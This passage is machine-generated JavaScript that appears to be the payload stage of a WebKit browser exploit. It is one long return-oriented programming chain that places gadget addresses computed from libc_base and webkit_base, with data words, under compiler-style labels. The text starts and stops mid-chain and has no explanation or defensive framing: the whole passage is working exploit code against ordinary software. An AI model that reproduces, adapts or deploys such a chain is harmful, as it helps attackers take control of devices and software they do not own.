//L5784:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5785:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5786:
db([4, 0]); // 0x4
set_gadget(libc_base+763368,); //pop rcx
//L5787:
db([4, 0]); // 0x4
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+298280, //L5789
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L5788:
db([4294967295, 4294967295]); // 0xffffffffffffffff
set_gadget(libc_base+759608,); //pop rax
//L5789:
db([0, 0]); // 0x0
set_gadgets([
libc_base+847417, //xor rax, rsi ; sub rax, rsi
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+298344, //L5791
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5791:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+298400, //L5792
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5792:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+298536, //L5796
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+298520, //L5795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5794:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5795:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5796:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+298600, //L5797
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5797:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5799:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+298680, //L5800
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5800:
db([0, 0]); // 0x0
//L5767:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+298728, //L5802
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5802:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5804:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+298848, //L5807
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+298832, //L5805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5805:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5807:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+299024, //L5810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+299040, //L5811
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+298992, //L5808
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+299008, //L5809
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5808:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5809:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5810:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5811:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+299136, //L5813
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+299120, //L5812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5812:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5813:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5814:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5815:
db([10, 0]); // 0xa
set_gadget(libc_base+763368,); //pop rcx
//L5816:
db([10, 0]); // 0xa
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+299336, //L5818
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5818:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+299392, //L5819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5819:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+299528, //L5823
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+299512, //L5822
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5821:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5822:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5823:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+299648, //L5826
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+299616, //L5824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5824:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5825:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5826:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+299784, //L5828
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+299800, //L5829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+299768, //L5827
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5827:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5828:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5829:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+299960, //L5834
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+299976, //L5835
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+299912, //L5831
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5831:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5832:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L5833:
db([1, 0]); // 0x1
set_gadget(webkit_base+3236123,); //pop r9
//L5834:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5835:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+300096, //L5836+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+300088, //L5836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5836:
db([0, 0]); // 0x0
set_gadgets([
ropchain+300112, //L5836+24
ropchain+300512, //L5830
libc_base+764760, //pop rsi
ropchain+300152, //L5837
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5837:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5839:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+300272, //L5842
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+300256, //L5840
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5840:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5842:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+300416, //L5845
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+300432, //L5846
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+300384, //L5843
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5843:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5844:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L5845:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5846:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+300504, //L5847
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5847:
db([0, 0]); // 0x0
//L5830:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+300632, //L5850
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+300648, //L5851
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+300616, //L5849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5849:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5850:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5851:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+300760, //L5853
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+300808, //L5856
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+300776, //L5854
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5853:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5854:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5855:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5856:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+300920, //L5857+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+300912, //L5857
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5857:
db([0, 0]); // 0x0
set_gadgets([
ropchain+300936, //L5857+24
ropchain+312224, //L5852
//L5858:
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5859:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5861:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+301072, //L5864
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+301056, //L5862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5862:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5864:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+301216, //L5867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+301184, //L5865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+301200, //L5866
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5865:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5866:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5867:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+301296, //L5868
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5868:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5870:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+301416, //L5873
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+301400, //L5871
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5871:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5873:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+301528, //L5874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+301560, //L5876
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+301544, //L5875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5874:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5875:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5876:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+301728, //L5879
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+755774, //mov rax, rsi
libc_base+764760, //pop rsi
ropchain+301696, //L5877
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+301712, //L5878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5877:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5878:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5879:
db([0, 0]); // 0x0
set_gadget(webkit_base+1438842,); //pop rdx
db([0, 0]); // 0x0
set_gadgets([
webkit_base+24132920, //div rsi ; add rax, rcx
libc_base+428453, //mov rax, rdx
libc_base+764760, //pop rsi
ropchain+301912, //L5883
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+755774, //mov rax, rsi
libc_base+764760, //pop rsi
ropchain+301880, //L5881
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+301896, //L5882
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5880:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5881:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5882:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5883:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+301968, //L5885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5885:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+302096, //L5887
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+302112, //L5888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+302080, //L5886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5886:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5887:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5888:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+302192, //L5889
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+302208, //L5890
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5889:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5890:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+302296, //L5891
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+302312, //L5893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5891:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5893:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5894:
db([4294967255, 4294967295]); // -0x29
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+1121481, //mov [rax], cl
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L5896:
db([4294967255, 4294967295]); // -0x29
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+302472, //L5899
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+302456, //L5897
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5897:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5899:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+302632, //L5903
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+302600, //L5901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+302616, //L5902
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5900:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5901:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5902:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5903:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+302688, //L5905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5905:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+302816, //L5907
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+302832, //L5908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+302800, //L5906
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5906:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5907:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5908:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+302992, //L5912
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+302960, //L5910
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+302976, //L5911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5909:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5910:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5911:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5912:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+303048, //L5914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5914:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+303176, //L5916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+303192, //L5917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+303160, //L5915
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5915:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5916:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5917:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+303272, //L5918
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+303288, //L5919
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5918:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5919:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+303384, //L5921
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+303368, //L5920
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5920:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5921:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+303464, //L5922
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5922:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5923:
db([10, 0]); // 0xa
set_gadget(libc_base+144605,); //pop rdi
//L5924:
db([10, 0]); // 0xa
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+303608, //L5925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+303640, //L5927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+303624, //L5926
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5925:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5926:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5927:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+303816, //L5929
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+303832, //L5930
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+303800, //L5928
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5928:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5929:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5930:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+303944, //L5932
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+303992, //L5935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+303960, //L5933
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5932:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5933:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5934:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5935:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+304104, //L5936+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
